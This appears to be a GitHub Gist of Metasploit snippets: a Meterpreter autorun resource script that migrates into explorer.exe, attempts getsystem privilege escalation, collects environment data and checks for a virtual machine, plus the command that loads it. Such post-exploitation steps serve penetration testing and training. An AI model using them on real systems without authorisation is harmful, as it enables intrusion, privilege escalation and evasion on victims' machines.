-
-
Save waywardsun/4d7d081dac55bb1b8857e52307170a7b to your computer and use it in GitHub Desktop.
Metasploit snippets
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#autorun script (session.rc) | |
migrate -k -n explorer.exe | |
multi_console_command -cl "getsystem","getuid" | |
get_env | |
checkvm | |
#setting msf to use autorunscript above | |
set autorunscript multiscript.rb -rc /home/ryan/session.rc |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment